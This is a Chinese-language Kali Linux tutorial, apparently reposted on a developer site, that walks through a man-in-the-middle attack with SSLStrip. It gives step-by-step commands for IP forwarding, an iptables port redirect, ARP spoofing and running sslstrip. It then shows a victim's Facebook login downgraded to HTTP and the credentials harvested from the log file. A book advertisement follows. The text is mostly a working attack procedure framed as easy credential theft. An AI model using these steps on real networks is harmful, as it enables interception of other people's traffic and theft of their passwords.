内容简介:利用SSLStrip发起中间人攻击可以透明地劫持网络中的http流量,查找HTTPS链接并重定向,然后将这些链接映射到类似的HTTP链接中或者同形的HTTPS链接。它还支持提供类似锁定图标,选择性日志记录和拒绝会话的模式。step1
利用SSLStrip发起中间人攻击可以透明地劫持网络中的http流量,查找HTTPS链接并重定向,然后将这些链接映射到类似的HTTP链接中或者同形的HTTPS链接。
它还支持提供类似锁定图标,选择性日志记录和拒绝会话的模式。
step1
首先我们将设备设置为转发模式,这样我们的设备就可以转发目标不是我们设备的数据包。
echo 1>/proc/sys/net/ipv4/ip_forward
step2
还需要设置iptables,将流量从80端口重定向到8080端口,确保出站连接发送到sslstrip中。
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
step3
需要找到我们的网关
route -n
前三步如图所示
step4
接下来我们需要找到目标主机的IP地址
step5
攻击者利用ARP欺骗技术将虚假的ARP消息发送到局域网中。
arpspoof -i -t
step6
现在我们打开一个新的终端并监听8080端口,命令如下
sslstrip -l 8080
step7
现在我们转到受害主机中,并且在浏览器中输入facebook.com,我们知道Facebook本来是使用的HTTPS协议,但是这里我们看到与Facebook是通过http建立的连接。
step8
现在,返回到家目录,查看sslstrip.log日志文件,我们可以看到受害者登录时输入的用户名和密码,如图:
就是这么easy,我们就拿到了受害者的凭证。
更多kali Linux教程,请参考:
· HPING3— 网络扫描器-包生成器
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
像计算机科学家一样思考Python
(美)Allen B.Downey / 赵普明 / 人民邮电出版社 / 2013-8 / 49
《像计算机科学家一样思考python》按照培养读者像计算机科学家一样的思维方式的思路来教授python语言编程。全书贯穿的主体是如何思考、设计、开发的方法,而具体的编程语言,只是提供一个具体场景方便介绍的媒介。《像计算机科学家一样思考python》并不是一本介绍语言的书,而是一本介绍编程思想的书。和其他编程设计语言书籍不同,它不拘泥于语言细节,而是尝试从初学者的角度出发,用生动的示例和丰富的练习来......一起来看看 《像计算机科学家一样思考Python》 这本书的介绍吧!